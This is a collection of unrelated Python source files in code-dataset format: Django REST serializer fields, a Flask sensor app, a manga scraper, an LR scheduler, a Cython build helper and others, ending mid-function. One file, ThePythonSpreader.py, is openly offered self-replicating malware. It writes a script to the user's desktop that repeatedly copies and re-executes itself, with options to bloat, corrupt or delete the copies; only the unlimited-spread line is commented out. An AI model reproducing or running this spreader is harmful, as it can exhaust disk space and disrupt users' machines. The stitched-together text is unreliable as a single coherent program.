            if self.write_field is not builtin_field:
                setattr(self.write_field, kwarg_name, kwargs[kwarg_name])

    def to_representation(self, value):
        return self.read_field.to_representation(value)

    def to_internal_value(self, data):
        return self.write_field.to_internal_value(data)

    def get_validators(self):
        # Validation is entirely the write field's concern.
        return self.write_field.get_validators()

    def validate_empty_values(self, data):
        """
        Validate empty values, and either:

        * Raise `ValidationError`, indicating invalid data.
        * Raise `SkipField`, indicating that the field should be ignored.
        * Return (True, data), indicating an empty value that should be
          returned without any further validation being applied.
        * Return (False, data), indicating a non-empty value, that should
          have validation applied as normal.
        """
        if data is empty:
            if getattr(self.root, 'partial', False):
                raise SkipField()
            # required/allow_null come from the write field, not from self.
            if self.write_field.required:
                self.fail('required')
            return (True, self.get_default())

        if data is None:
            if not self.write_field.allow_null:
                self.fail('null')
            return (True, None)

        return (False, data)

    def _build_field(self):
        """Construct the write field from the parent serializer's model info,
        mirroring ModelSerializer's own field-building pipeline.

        NOTE(review): relies on ``self._kwargs`` being populated elsewhere
        (not set in this class) — confirm where it comes from.
        """
        model = getattr(self.parent.Meta, 'model')
        depth = getattr(self.parent.Meta, 'depth', 0)
        info = model_meta.get_field_info(model)

        # Determine any extra field arguments and hidden fields that
        # should be included
        extra_kwargs = self.parent.get_extra_kwargs()
        extra_kwargs.update(self._kwargs)
        extra_kwargs, hidden_fields = self.parent.get_uniqueness_extra_kwargs(
            [self.field_name], [self], extra_kwargs
        )

        extra_field_kwargs = {
            key: value for key, value in self._kwargs.items()
            if key not in ['read_field']
        }

        # Determine the serializer field class and keyword arguments.
        field_class, field_kwargs = self.parent.build_field(
            self.field_name, info, model, depth
        )

        # Include any kwargs defined in `Meta.extra_kwargs`
        extra_field_kwargs.update(
            extra_kwargs.get(self.field_name, {})
        )
        field_kwargs = self.parent.include_extra_kwargs(
            field_kwargs, extra_field_kwargs
        )

        # Create the serializer field.
        return field_class(**field_kwargs)

    def bind(self, field_name, parent):
        super().bind(field_name, parent)
        self.read_field.bind(field_name, parent)
        # Build the automatic write field lazily, once the parent is known.
        if self.write_field is builtin_field:
            self.write_field = self._build_field()
        self.write_field.bind(field_name, parent)
class WriteListSerializeFriendlyRecursiveField(RecursiveField):
    """RecursiveField variant that copies the parent serializer's context to
    the proxied field when the proxied field has none of its own (needed for
    writable list serializers)."""

    @property
    def proxied(self):
        self._proxied = super().proxied
        # bind_args[1] is the parent the field was bound to; borrow its
        # context when the proxied field's context is empty.
        if (self._proxied and not self._proxied.context and self.bind_args[1] and self.bind_args[1].context):
            self._proxied.context = self.bind_args[1].context
        return self._proxied
class CommaSeparatedExportField(serializers.Field):
    """Read-only field rendering an iterable as a comma separated string,
    optionally extracting ``export_attr`` from each item first. Falsy items
    are omitted from the output."""

    export_attr = None

    def __init__(self, *args, **kwargs):
        self.export_attr = kwargs.pop('export_attr', None)
        super().__init__(*args, **kwargs)

    def get_attribute(self, instance):
        """Fetch the source attribute via get_attribute_smart, re-raising
        lookup failures with a descriptive, serializer-oriented message."""
        try:
            return get_attribute_smart(instance, self.source_attrs)
        except (KeyError, AttributeError) as exc:
            if not self.required and self.default is empty:
                raise SkipField()

            msg = (
                'Got {exc_type} when attempting to get a value for field '
                '`{field}` on serializer `{serializer}`.\nThe serializer '
                'field might be named incorrectly and not match '
                'any attribute or key on the `{instance}` instance.\n'
                'Original exception text was: {exc}.'.format(
                    exc_type=type(exc).__name__,
                    field=self.field_name,
                    serializer=self.parent.__class__.__name__,
                    instance=instance.__class__.__name__,
                    exc=exc
                )
            )
            raise type(exc)(msg)

    def to_representation(self, value):
        # Bug fix: deduplicate while preserving input order. The previous
        # set(value) made the exported string's ordering nondeterministic
        # between runs.
        value = list(dict.fromkeys(value))
        if self.export_attr:
            value = [get_attribute_smart(item, self.export_attr) for item in value]

        return ', '.join([str(item) for item in value if item])
class DynamicChoicesField(serializers.ChoiceField):
    """ChoiceField whose choices can be swapped at runtime: no reverse
    mapping is precomputed, so assigning ``choices`` later is safe."""

    def __init__(self, *args, **kwargs):
        self._current_choices = {}
        super().__init__(*args, **kwargs)

    @property
    def choices(self):
        return self._current_choices

    @choices.setter
    def choices(self, value):
        self._current_choices = value

    @property
    def choice_strings_to_values(self):
        # model_utils Choices iterates as (db value, display) pairs.
        if isinstance(self.choices, Choices):
            return {k: v for k, v in self.choices}
        return {
            str(key): key for key in self.choices.keys()
        }

    @choice_strings_to_values.setter
    def choice_strings_to_values(self, value):
        # Recomputed on every read above, so writes are intentionally ignored.
        # no need to do here anything
        return
class FunctionRelatedField(serializers.RelatedField):
    """Related field whose representation is produced by an arbitrary
    callable applied to the related object."""

    def __init__(self, callable_function=None, **kwargs):
        assert callable_function is not None, 'The `callable_function` argument is required.'
        self.callable_function = callable_function
        super().__init__(**kwargs)

    def to_representation(self, obj):
        return self.callable_function(obj)
| 2.0625 | 2 |
constants.py | Ares513/DetectingTrollsApi | 4 | 12765131 | MAX_VECTOR_COUNT = 40*300
LEARNING_RATE = 0.001 | 1.148438 | 1 |
cyborg/urls.py | aaronbassett/django-cyborg | 4 | 12765132 | # -*- coding: utf-8 -*-
from django.conf.urls import url, include
from django.views.generic import TemplateView
# Plain-text robots.txt / humans.txt served directly from templates.
cyborg_patterns = [
    url(
        r'^robots\.txt$',
        TemplateView.as_view(
            template_name='cyborg/robots.txt',
            content_type='text/plain'
        ),
        name='robots'
    ),
    url(
        r'^humans\.txt$',
        TemplateView.as_view(
            template_name='cyborg/humans.txt',
            content_type='text/plain'
        ),
        name='humans'
    ),
]

# NOTE(review): `include(..., namespace=...)` without an app_name is only
# accepted by Django < 2.0 — confirm the supported Django version.
urlpatterns = [
    url(r'', include(cyborg_patterns, namespace='cyborg'))
]
| 1.929688 | 2 |
app.py | chazapp/garden | 0 | 12765133 | <gh_stars>0
from flask import Flask, Blueprint, current_app
from threading import Thread
from sensors import Sensors
from lights import Lights
bp = Blueprint('metrics', __name__)
@bp.route('/metrics', methods=['GET'])
def metrics():
    """Expose the current sensor readings in Prometheus text format:
    one `sensors{name="..."} value` sample line per reading."""
    sensors = current_app.sensors
    readings = [
        ('hygrometer', sensors.humidity.value),
        ('temperature', sensors.temperature.value),
        ('light', sensors.light.value),
    ]
    return ''.join('sensors{name="%s"} %s\n' % (name, value)
                   for name, value in readings)
def create_app():
    """Application factory: build the Flask app with sensor and light
    controllers attached and the metrics blueprint registered."""
    app = Flask(__name__)
    app.sensors = Sensors()
    app.lights = Lights()
    app.register_blueprint(bp)
    return app
if __name__ == '__main__':
    app = create_app()
    # Presumably starts background sensor polling before serving HTTP —
    # confirm in sensors.py.
    app.sensors.start()
    app.run(port=5000)
| 2.40625 | 2 |
tankobon/sources/mangakakalot.py | onyxware/manhua | 1 | 12765134 | <reponame>onyxware/manhua
# coding: utf8
import re
from .. import models
from . import base
# mangakakalot chapter urls always end with '/chapter_(number)'.
RE_CHAPTER = re.compile(r"(\d+(\.\d+)?)")
# Extracts the text after the last ': ' in a chapter link's title attribute.
RE_TITLE = re.compile(r"^.*: (.*)$")
class Parser(base.Parser):
    """tankobon source parser for mangakakalot.com."""

    domain = r"mangakakalot.com"

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # One-entry soup cache so repeated calls for the same URL
        # (e.g. metadata() then add_chapters()) fetch the page only once.
        self._url = None
        self._soup = None

    def _get_soup(self, url):
        """Return a cached soup for *url*, fetching on cache miss."""
        if url != self._url:
            self._soup = self.soup(url)
            # Bug fix: record the cached URL — previously it was never set,
            # so the cache could never hit and every call re-fetched.
            self._url = url
        return self._soup

    def metadata(self, url):
        """Scrape title, alt titles, authors, genres, description and cover
        image URL from a manga's info page."""
        soup = self._get_soup(url)

        info = soup.find(class_="manga-info-text").find_all("li")

        title_tag = info[0]
        title = title_tag.h1.text
        # Alternative titles appear after a colon, comma-separated.
        alt_titles_tag = title_tag.h2.text.partition(":")[-1]
        alt_titles = alt_titles_tag.split(",")

        authors = [a.text.strip() for a in info[1].find_all("a")]
        genres = [a.text.lower().replace(" ", "_") for a in info[6].find_all("a")]

        desc_tag = soup.find("div", id=["panel-story-info-description", "noidungm"])
        # Drop the leading header paragraph when present (replaces the old
        # try/except AttributeError/finally construct; also removed a stray
        # debug print of the cover URL).
        if desc_tag.p is not None:
            desc_tag.p.decompose()
        desc = desc_tag.text

        cover = soup.find("div", class_="manga-info-pic").img["src"]

        return models.Metadata(
            url=url,
            title=title,
            alt_titles=alt_titles,
            authors=authors,
            genres=genres,
            desc={"en": desc},
            cover=cover,
        )

    def add_chapters(self, manga):
        """Register every chapter found on the manga's info page."""
        soup = self._get_soup(manga.meta.url)

        for tag in soup.find_all("div", class_="row"):
            link = tag.span.a
            if not link:
                continue

            url = link["href"]
            # Chapter id comes from the trailing '/chapter_<number>' path part.
            cid = RE_CHAPTER.search(url.split("/")[-1]).group(1)
            title = RE_TITLE.match(link["title"]).group(1)

            manga.add(
                models.Chapter(
                    id=cid,
                    url=url,
                    title=title,
                )
            )

    def add_pages(self, chapter):
        """Collect the page image URLs for one chapter."""
        soup = self.soup(chapter.url)
        chapter.pages = [
            tag["src"]
            for tag in soup.find("div", class_="container-chapter-reader").find_all(
                "img", src=True
            )
        ]
| 2.5 | 2 |
mlcomp/contrib/catalyst/optim/cosineanneal.py | sUeharaE4/mlcomp | 166 | 12765135 | from torch.optim.lr_scheduler import CosineAnnealingLR
class OneCycleCosineAnnealLR(CosineAnnealingLR):
    """CosineAnnealingLR with restarts: whenever a cosine cycle of length
    ``T_max`` completes, the learning rate is reset to the base value and a
    new cycle begins."""

    def __init__(self, *args, **kwargs):
        # start_epoch marks where the current cycle began. last_epoch is
        # pre-set to None so step() can tell real steps from the implicit
        # step the base scheduler takes during initialisation.
        self.start_epoch = None
        self.last_epoch = None
        super().__init__(*args, **kwargs)

    def step(self, epoch=None):
        if self.last_epoch is not None:
            if self.start_epoch is None:
                # First real step: start the first cycle from the base LR.
                self.start_epoch = self.last_epoch
                self.last_epoch = 0
                for i in range(len(self.base_lrs)):
                    self.optimizer.param_groups[i]['lr'] = self.base_lrs[0]
            if self.last_epoch >= self.T_max - 1:
                # Cycle complete: restart the anneal from the base LR.
                # NOTE(review): every param group is reset to base_lrs[0],
                # not to its own base_lrs[i] — confirm this is intentional.
                self.start_epoch = self.last_epoch
                self.last_epoch = -1
                for i in range(len(self.base_lrs)):
                    self.optimizer.param_groups[i]['lr'] = self.base_lrs[0]
        super().step(epoch)
super().step(epoch)
__all__ = ['OneCycleCosineAnnealLR']
| 2.25 | 2 |
ThePythonSpreader.py | 53686b/ThePythonSpreader | 0 | 12765136 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Code by: @53686b (Github/Twitter)
# Version: 1.0.1 (23/03/2021)
"""
ThePythonSpreader is a script that creates files capable of multiplying themselves.
The first file copies itself to a new file, which results of the addition of a random number
to the original file name, and then executes it. Each new file will repeat the same pattern
indefinetely.
Some customization is allowed through the settings found between lines 40 and 89.
For safety reasons the self-multiplying behavior of each copy is deactivated by default.
To activate it, check line 172.
Make sure to use it only in a safe environment, such as a disposable Virtual Machine.
*** Full responsibility for any damage caused by this script goes to the user. ***
"""
############################################################################################
###### ## ## ####### # ## ## ## ## ## # #######
###### ### # ## ###### #### ### # ### # ##### ### # ### # ##### ### ######
###### ### ######## ## ## ## # # ### # # #######
###### ######## ########### # ###### ## ## ##### ### # ### # ##### ## #######
###### ######## ### ## ## ###### ### # # ### # ## # ### ######
############################################################################################
import os
from getpass import getuser
from random import randrange
user = getuser()
############################################################################################
########################## Default Settings ##########################
############################################################################################
name , safetyDelay , randomRange = 'Spreader' , 1 , 10
# name - Name of the file.
# safetyDelay - Time it takes to create a new file. (float, seconds)
# randomRange - amount of file each new one creates.
############################################################################################
# Choose the directory where you want to create the spreader file. Must be a string.
# (Default = "c:\\Users\\" + user + "\\desktop\\")
targetDirectory = "c:\\Users\\" + user + "\\desktop\\"
############################################################################################
######################### Advanced Settings ##########################
############################################################################################
# Choose if you want to create a ReadMe file in the targetted directory.
ReadMe = False
txt = "This is a message"
############################################################################################
######### KeepSelf 0 ### DeleteContent 1 ### TurnIntoGarbage 2 ### DeleteSelf 3 #########
############################################################################################
# Choose from above, the kind of behaviour each file should have after multiplying.
fileLife = 0
############################################################################################
######################################## Size ########################################
############################################################################################
amountOfGarbage = 1 # (int, kbytes~)
# If you chose the TurnIntoGarbage option.
makeThemExtraHeavy = False
amountOfExtraGarbage = 1 # (int, kbytes~)
# makeThemExtraHeavy - Adds garbage to the files in order to make them heavier.
# This is independent from the TurnIntoGarbage option as it leaves the code alone.
############################################################################################
############################################################################################
############################################################################################
garbage , extraGarbage = "" , ""
if fileLife == 2:
garbage = """
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################"""
if makeThemExtraHeavy:
extraGarbage = """
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################"""
# Creates the ReadMe file if the option is selected.
if ReadMe:
read = open(targetDirectory + "README" + ".txt" , "w")
read.write(txt)
read.close()
# Creates the first file.
f = open(targetDirectory + name + ".py" , "w")
f.write(
# Adds the configs chosen to the DNA of the the file.
"x = " + "\"" + name + "\"" + "\n"
"y = " + str(safetyDelay) + "\n"
"z = " + str(randomRange) + "\n"
"v = " + str(fileLife) + "\n"
"t = '''" + garbage + "'''\n"
# Adds the reproductive DNA to the file.
"""
import os
from time import sleep
from random import randrange
from shutil import copyfile
i = randrange(z)
nL = len(x)
os.path.basename(__file__)
nNS = (os.path.basename(__file__)[nL:])[:-3] + str(i)
s = __file__
d = os.path.join(os.path.dirname(__file__), x + nNS + '.py')
copyfile(s, d)
sleep(y)
k = []
for g in os.listdir(os.path.abspath(os.path.dirname(__file__))):
for n in range(0,z):
if g == (os.path.basename(__file__)[:-3] + str(n) + ".py"):
k.append(g)
if v == 0 and len(k) == z:
exec(open(__file__).read())
elif v == 1 and len(k) == z:
f = open(__file__ , "w")
f.write("")
f.close
elif v == 2 and len(k) == z:
f = open(__file__ , "w")
f.write(t)
f.close
elif v == 3 and len(k) == z:
os.remove(__file__)
else:
exec(open(__file__).read())\n"""
############################################################################################
############ The Line Below Will Make The Program Spread Without Limits ############
############################################################################################
""" #os.system(os.path.dirname(__file__), name + nNS + '.py')"""
############################################################################################
########################## !Delete the '#' at own risk! ############################
############################################################################################
# Makes the file heavier if the option is selected.
+ "\n" + amountOfExtraGarbage * extraGarbage)
f.close()
#This executes the first file.
#os.system(targetDirectory + name + ".py")
############################################################################################
############################################################################################
############################################################################################
| 3.125 | 3 |
lin.py | iboraham/linear-reg-from-scratch | 0 | 12765137 | import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
from shared_utilities import find_linearReg_optimal_test_size
from shared_utilities import plot_linear_reg
from shared_utilities import check_outlier
from shared_utilities import plot_scatter
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
if __name__ == '__main__':
    # Load the real-estate dataset: features are all middle columns,
    # the target (price) is the last column.
    df = pd.read_csv('Real estate.csv')
    X = df.iloc[:, 1:-1]
    y = df.iloc[:, -1]
    plot_scatter(X.iloc[:, 2], y, 'scatter.png')

    # Standardize features before PCA (PCA is scale-sensitive).
    sc = StandardScaler()
    X_scaled = sc.fit_transform(X)

    # BUG FIX: removed leftover debugging code that appended X to
    # 'values.txt' and then raised a bare Exception, which made the
    # entire PCA/regression pipeline below unreachable dead code.

    # PCA for feature reduction; 'mle' lets PCA choose the dimensionality.
    pca = PCA(n_components='mle', svd_solver='full', random_state=42)
    X_pca = pca.fit_transform(X_scaled)
    print(X_pca.min(), X_pca.max())

    # NOTE(review): test size is tuned on the raw X, but the split is done
    # on X_pca -- presumably intentional; confirm with shared_utilities.
    test_size = find_linearReg_optimal_test_size(X, y)
    X_train, X_test, y_train, y_test = train_test_split(X_pca, y, test_size=test_size, random_state=42)
    mdl = LinearRegression().fit(X_train, y_train)
    y_pred = mdl.predict(X_test)
    score = r2_score(y_test, y_pred)
    # plot_linear_reg('linear_reg.png', y_pred, X_test.iloc[:, 2], y_test)
| 2.71875 | 3 |
extra_utils/finetune_to_save_states.py | humanlab/HaRT | 0 | 12765138 | import pandas as pd
import torch
import torch.nn as nn
from transformers.modeling_outputs import SequenceClassifierOutputWithPast
from ..src.model.hart import HaRTPreTrainedModel
class ArHulmForSequenceClassification(HaRTPreTrainedModel):
    """HaRT/AR-HuLM wrapper that runs the transformer and writes aggregated
    per-user hidden states to CSV files.

    NOTE(review): despite the class name, ``forward`` returns the aggregated
    user states as ``logits`` together with a constant dummy loss -- this is
    a state-extraction utility rather than a trainable classification head.
    """
    # _keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.masked_bias", r"lm_head\.weight"]

    def __init__(self, config, output_dir, agg_type, arhulm=None):
        # config: model config; must expose num_labels, use_history_output, n_embd.
        # output_dir: directory that receives the per-user state CSV files.
        # agg_type: aggregation over per-block user states; one of
        #   'last', 'sum', 'avg', 'masked_last', 'masked_sum', 'masked_avg'.
        # arhulm: optional pre-built transformer; falls back to a bare
        #   HaRTPreTrainedModel constructed from config.
        super().__init__(config)
        self.num_labels = config.num_labels
        self.use_history_output = config.use_history_output
        # Linear scoring head; NOTE(review): never applied in forward() below.
        self.score = nn.Linear(config.n_embd, self.num_labels, bias=False)
        self.output_dir = output_dir
        self.agg_type = agg_type
        if arhulm:
            self.transformer = arhulm
        else:
            self.transformer = HaRTPreTrainedModel(config)
        self.init_weights()

        # Model parallel
        self.model_parallel = False
        self.device_map = None

    def forward(
        self,
        input_ids=None,
        user_ids=None,
        history=None,
        past_key_values=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        use_cache=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
            Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
            config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
            If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        # Run the underlying HaRT transformer, requesting per-block last
        # hidden states so the user-state history can be aggregated below.
        transformer_outputs = self.transformer(
            input_ids,
            history=history,
            output_block_last_hidden_states=True,
            past_key_values=past_key_values,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            use_cache=use_cache,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        # One user-id row per hidden dimension so the flattened state matrix
        # below can be labelled row-by-row.
        # NOTE(review): 768 is a hard-coded hidden size -- presumably equals
        # config.n_embd; confirm before using with other model widths.
        users = pd.DataFrame(user_ids.cpu().detach().numpy(), columns=['user_id'])
        users = users.loc[users.index.repeat(768)]
        users.reset_index(drop=True, inplace=True)

        # Aggregate the per-block user states according to agg_type.
        # 'masked_*' variants weight each block by its mask before combining.
        if self.agg_type=='last':
            # State after the final block only.
            user_states = transformer_outputs.history[0][-1]
        elif self.agg_type=='sum':
            all_blocks_user_states = torch.stack(transformer_outputs.history[0], dim=1)
            user_states = torch.sum(all_blocks_user_states, dim=1)
        elif self.agg_type=='avg':
            all_blocks_user_states = torch.stack(transformer_outputs.history[0], dim=1)
            user_states = torch.sum(all_blocks_user_states, dim=1)/all_blocks_user_states.shape[1]
        elif self.agg_type=='masked_last':
            states = transformer_outputs.history[0]
            masks = transformer_outputs.history[1]
            multiplied = tuple(l * r for l, r in zip(states, masks))
            all_blocks_user_states = torch.stack(multiplied, dim=1).cpu().detach()
            all_blocks_masks = torch.stack(masks, dim=1)
            # Index of the last unmasked block per user (mask sum - 1).
            divisor = torch.sum(all_blocks_masks, dim=1).cpu().detach()
            user_states = all_blocks_user_states[range(all_blocks_user_states.shape[0]), divisor.squeeze()-1]
        elif self.agg_type=='masked_sum':
            states = transformer_outputs.history[0]
            masks = transformer_outputs.history[1]
            multiplied = tuple(l * r for l, r in zip(states, masks))
            all_blocks_user_states = torch.stack(multiplied, dim=1)
            user_states = torch.sum(all_blocks_user_states, dim=1)
        elif self.agg_type=='masked_avg':
            states = transformer_outputs.history[0]
            masks = transformer_outputs.history[1]
            multiplied = tuple(l * r for l, r in zip(states, masks))
            all_blocks_user_states = torch.stack(multiplied, dim=1)
            all_blocks_masks = torch.stack(masks, dim=1)
            # Average over unmasked blocks only.
            sum = torch.sum(all_blocks_user_states, dim=1)
            divisor = torch.sum(all_blocks_masks, dim=1)
            user_states = sum/divisor

        logits = user_states
        # NOTE(review): constant dummy loss; also hard-requires CUDA.
        # Confirm no caller relies on a meaningful loss value.
        loss = torch.Tensor([0.1]).cuda()

        # Flatten the (users x hidden) state matrix into long form and dump
        # it to one CSV per batch, keyed by the first user id in the batch.
        user_states = pd.DataFrame(user_states.cpu().detach().numpy())
        user_states = user_states.stack().reset_index()
        user_states['level_0'] = users['user_id']
        user_states.rename(columns={'level_0':'user_id','level_1': 'column_number', 0:'value'}, inplace=True)
        user_states.to_csv(self.output_dir + '/test_states_' + str(user_ids[0].item()) + '.csv', index=False)

        return SequenceClassifierOutputWithPast(
            loss=loss,
            logits=logits,
            past_key_values=transformer_outputs.past_key_values,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )
| 2.4375 | 2 |
src/terra/contracts/apollo/__init__.py | fentas/staketaxcsv | 0 | 12765139 | import logging
from terra import util_terra
from terra.execute_type import (
_execute_type,
)
from .zap import (
handle_zap_into_strategy,
handle_zap_out_of_strategy,
)
def handle(exporter, elem, txinfo, index):
    """Dispatch an Apollo protocol transaction to its specific handler.

    Zap in/out messages get dedicated handlers; anything else is classified
    generically and the resulting execute type is returned.

    BUG FIX: the final return line had stray artifact tokens
    ("| 2.03125 | 2 |") fused onto it, which made the module a syntax error.
    """
    execute_msg = util_terra._execute_msg(elem, index)

    if "send" in execute_msg:
        msg = execute_msg["send"]["msg"]

        # Apollo zap operations
        if "zap_into_strategy" in msg:
            return handle_zap_into_strategy(exporter, elem, txinfo)
        if "zap_out_of_strategy" in msg:
            return handle_zap_out_of_strategy(exporter, elem, txinfo)

    # Fall through to generic classification for everything else.
    execute_type = _execute_type(elem, txinfo, index)
    logging.info("[apollo] General transaction type=%s txid=%s", execute_type, elem["txhash"])
    return execute_type
src/pyc/compile.py | ahojukka5/pyc | 2 | 12765140 | <gh_stars>1-10
import os
import sysconfig
import subprocess
from typing import Tuple
from Cython.Build import cythonize
from Cython.Compiler import Options
def compile(source_file: str, verbose: bool = False) -> Tuple[int, str]:
    """Compile a Python source file to a native executable using Cython.

    Args:
        source_file: Path to the ``.py`` file to compile.
        verbose: When True, echo the generated compiler command line.

    Returns:
        Tuple of (compiler exit status, executable path). A non-zero status
        indicates the C compilation step failed.
    """
    basename = os.path.splitext(source_file)[0]
    c_file = basename + ".c"
    executable = "a.out"

    # Generate the C translation, embedding a main() entry point.
    Options.embed = "main"
    compiler_directives = {"language_level": "3"}  # or "2" or "3str"
    cythonize(source_file, compiler_directives=compiler_directives,
              force=True, quiet=not verbose)

    # Compile the C file against the running interpreter's configuration.
    cvars = sysconfig.get_config_vars()
    CC = cvars["CC"]                  # x86_64-linux-gnu-gcc
    INCLUDEPY = cvars["INCLUDEPY"]    # /usr/include/python3.8
    BLDLIBRARY = cvars["BLDLIBRARY"]  # -lpython3.8
    BINLIBDEST = cvars["BINLIBDEST"]  # /usr/lib/python3.8
    cmd = f"{CC} -O2 {c_file} -I{INCLUDEPY} -L{BINLIBDEST} {BLDLIBRARY} -o {executable}"
    if verbose:
        print(cmd)
    # BUG FIX: subprocess.check_call() raises CalledProcessError on failure,
    # so the non-zero check below was unreachable dead code.  subprocess.call()
    # returns the exit status, letting the failure branch (and the documented
    # return code) actually work.
    return_code = subprocess.call(cmd.split(" "))
    if return_code != 0:
        print("Compilation failed.")
    return return_code, executable
| 2.578125 | 3 |
python/to-lower-hyphen.py | smoogi/magic | 0 | 12765141 | """
Developed by: <NAME> (2018)
This script rename all files in the specified directory to lowercase and then replace all white space with hyphen (-).
"""
import os
import sys
import glob
import argparse
# Greet the user with a short description of what the script does.
print("\nDeveloped by: <NAME> (2018)\n"
      "This script rename all files in the specified directory to lowercase.\n"
      "and then replace all white space with hyphen (-).\n")

# Parse the single positional argument: the directory to process.
parser = argparse.ArgumentParser()
parser.add_argument("working_directory", help="Path to a working directory")
cli_args = parser.parse_args()
target_dir = cli_args.working_directory

print("Beginning the process...")

# iglob yields lazily, so even huge directories are handled one entry at a time.
for entry in glob.iglob(os.path.join(target_dir, '*')):
    # Directories are left untouched.
    if os.path.isdir(entry):
        continue
    # Lowercase the stem, swap spaces for hyphens, keep the extension as-is.
    stem, extension = os.path.splitext(os.path.basename(entry))
    renamed = os.path.join(target_dir, stem.replace(" ", "-").lower() + extension)
    os.renames(entry, renamed)
    # Tell the user about each rename as it happens.
    print("'" + entry + "' has been renamed.")

print("Process finished successfully.\n")
| 3.59375 | 4 |
pe/_definition.py | goodmami/pe | 18 | 12765142 |
from typing import Dict, Tuple, Callable, Any
from pe._constants import Operator
from pe._errors import Error
from pe._escape import escape
# Short module-level aliases for the Operator enum members, used throughout
# the formatting helpers below.
DOT = Operator.DOT
LIT = Operator.LIT
CLS = Operator.CLS
RGX = Operator.RGX
SYM = Operator.SYM
OPT = Operator.OPT
STR = Operator.STR
PLS = Operator.PLS
AND = Operator.AND
NOT = Operator.NOT
CAP = Operator.CAP
BND = Operator.BND
SEQ = Operator.SEQ
CHC = Operator.CHC
RUL = Operator.RUL
DEF = Operator.DEF
DBG = Operator.DBG
class Definition:
    """An abstract definition of a parsing expression.

    A definition is a lightweight (operator, arguments) pair; all structure
    lives in ``args``, whose shape depends on the operator.
    """

    __slots__ = ('op', 'args')

    def __init__(self, op: Operator, args: Tuple[Any, ...]):
        self.op = op
        self.args = args

    def __repr__(self):
        return f'({self.op}, {self.args!r})'

    def __str__(self):
        # Render as PEG notation with no enclosing operator context.
        return _format(self, None)

    def __eq__(self, other: object):
        if isinstance(other, Definition):
            return self.op == other.op and self.args == other.args
        return NotImplemented

    def format(self) -> str:
        """Render this definition as it would appear in a grammar rule."""
        return _format(self, DEF)
def _format_dot(defn: Definition, prev_op: Operator) -> str:
return '.'
def _format_literal(defn: "Definition", prev_op: "Operator") -> str:
    """Render a string literal, double-quoted with internal escaping."""
    escaped = escape(defn.args[0], ignore="'[]")
    return '"' + escaped + '"'
def _format_class(defn: "Definition", prev_op: "Operator") -> str:
    """Render a character class; a negated class becomes ``(![...] .)``."""
    pieces = []
    for start, end in defn.args[0]:
        # Ranges render as "a-b"; single characters as just "a".
        if end:
            pieces.append(escape(start, ignore='"\'') + '-' + escape(end, ignore='"\''))
        else:
            pieces.append(escape(start, ignore='"\''))
    clsstr = ''.join(pieces)
    if defn.args[1]:
        # Negated class: match anything that is NOT in the class.
        return '(![' + clsstr + '] .)'
    return '[' + clsstr + ']'
def _format_regex(defn: Definition, prev_op: Operator) -> str:
return f'`{defn.args[0]}`' # temporary syntax
def _format_nonterminal(defn: Definition, prev_op: Operator) -> str:
return defn.args[0]
# (prefix, delimiter, suffix) decorations wrapped around each operator's
# rendered sub-expression(s).  '{}' placeholders inside a prefix/suffix are
# later filled from defn.args[1:] (e.g. the bound name for BND, the action
# for RUL).  A non-empty delimiter marks operators with multiple children.
_format_decorators: Dict[Operator, Tuple[str, str, str]] = {
    OPT: ('', '', '?'),
    STR: ('', '', '*'),
    PLS: ('', '', '+'),
    AND: ('&', '', ''),
    NOT: ('!', '', ''),
    CAP: ('~', '', ''),
    BND: ('{}:', '', ''),
    SEQ: ('', ' ', ''),
    CHC: ('', ' / ', ''),
    RUL: ('', '', ' -> {}'),
}
def _format_recursive(defn: "Definition", prev_op: "Operator") -> str:
    """Render an operator with children, parenthesizing when precedence
    requires it."""
    prefix, separator, suffix = _format_decorators[defn.op]
    # Multi-child operators (SEQ, CHC) join their children; the rest wrap one.
    if separator:
        inner = separator.join(_format(sub, defn.op) for sub in defn.args[0])
    else:
        inner = _format(defn.args[0], defn.op)
    # Escape literal braces so the .format() below only fills the decorator
    # placeholders (e.g. the bound name for BND) from the remaining args.
    inner = inner.replace('{', '{{').replace('}', '}}')
    rendered = (prefix + inner + suffix).format(*defn.args[1:])
    # Parenthesize when embedded under an operator of equal/higher precedence.
    if prev_op and defn.op.precedence <= prev_op.precedence:
        return '(' + rendered + ')'
    return rendered
def _format_debug(defn: "Definition", prev_op: "Operator") -> str:
    """Debug nodes are transparent: render the wrapped expression as-is."""
    wrapped = defn.args[0]
    return _format(wrapped, prev_op)
# Signature shared by every operator-specific formatter: it receives the
# definition to render and the enclosing operator (for precedence decisions).
_Formatter = Callable[[Definition, Operator], str]

# Dispatch table mapping each operator to its rendering function.
_format_map: Dict[Operator, _Formatter] = {
    DOT: _format_dot,
    LIT: _format_literal,
    CLS: _format_class,
    RGX: _format_regex,
    SYM: _format_nonterminal,
    OPT: _format_recursive,
    STR: _format_recursive,
    PLS: _format_recursive,
    AND: _format_recursive,
    NOT: _format_recursive,
    CAP: _format_recursive,
    BND: _format_recursive,
    SEQ: _format_recursive,
    CHC: _format_recursive,
    RUL: _format_recursive,
    DBG: _format_debug,
}
def _format(defn: "Definition", prev_op: "Operator") -> str:
    """Dispatch *defn* to its operator-specific formatter."""
    try:
        formatter = _format_map[defn.op]
    except KeyError:
